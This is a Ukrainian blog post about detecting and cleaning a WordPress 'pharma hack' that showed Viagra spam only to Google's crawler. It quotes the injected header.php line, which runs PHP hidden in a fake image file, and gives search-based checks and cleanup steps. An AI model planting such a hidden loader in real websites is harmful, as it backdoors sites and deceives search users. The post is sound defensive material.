Фарма-хак: спам у кеші google

Сьогодні повідомили, що мій блог, ймовірно, хакнули – купа реклами віагри. Власне, колись було щось подібне. Тоді підступні рекламні посилання з’явились у хедері блога. Виявити їх було просто. Цього ж разу візуальний огляд результатів не дав. Бо, як виявилось, спам з’явився у самій пошуковій видачі Google!

У кеші Google ваш блог виглядає, як медичний порадник по боротьбі з імпотенцією? Пора хвилюватись – це фарма-хак (pharma-hack)! :devil:

Основна особливість цього виду хаку – результат дії шкідливого коду видно лише у пошуковій видачі! Для звичайних відвідувачів ваш блог виглядатиме так само як завжди. І навіть при перевірці html-коду сторінки ви не побачити жодних згенерованих скриптом спам-посилань. Цей скрипт працює так, що спам-посилання бачить тільки гуглбот (“павук”, що індексує сайти для Google).

Щоб провести первинну діагностику чи часом не ушкоджений блог фарма-хаком, здійсніть ось такий пошук у Google: “viagra site:ваш_сайт“. Замість слова viagra варто спробувати також cialis або levitra.

Ще одна особливість. Схоже, хак атакує в першу чергу (і головним чином) сторінки з високим PR. Ну звісно, адже ціль зловмисників – подати свою рекламу у пошуковій видачі для мого блога.

Щодо реалізації, фарма-хак використовує ті ж прийоми, що і колишній спам-хак. А саме: у файл header.php було додано шкідливий код. Хоча, з таким же успіхом це міг бути і footer.php i index.php. Підозра на файл header.php впала одразу, як тільки я помітив, що відтепер він у кодуванні ANSI. Тут проявилась специфіка україномовного блога – звісно, що редаговані мною файли теми у кодуванні UTF-8 without BOM, адже я локалізовував файли теми. Загалом же “лівий” код виглядав ось так:

$wp__theme_icon=create_function(",file_get_contents('абсолютний_шлях_на_сервері_до_теми/images/s.jpg'));$wp__theme_icon(); ?>

Псевдо-зображення “s.jpg” теж потрібно видалити. Як підказує нам код, цей файл знаходиться у папці “images”. Також, корені шкідливого коду можуть бути у файлі functions.php.

Наступний крок – потрібно видалити шкідливий код з бази даних. Ось у цій статті детально описано, як і де потрібно провести пошук. У моїй БД нічого шкідливого начебто немає. На мою думку, причиною є те, що я застосовую префікс до таблиці WP. Тож ось моя порада: завжди застосовуйте кастомний префікс для таблиці WP!. І раджу ознайомитись із статтями на сайті WordPress.co.ua – Безпечний блог на WordPress – поради, частина 1 та Безпечний блог на WordPress – поради, частина 2

Очистивши свій блог, зараз чекаю на його переіндексацію. Побажайте мені удачі! 😉

П.С. Особлива подяка Олегу Мішину у тому, що допоміг виявити проблему!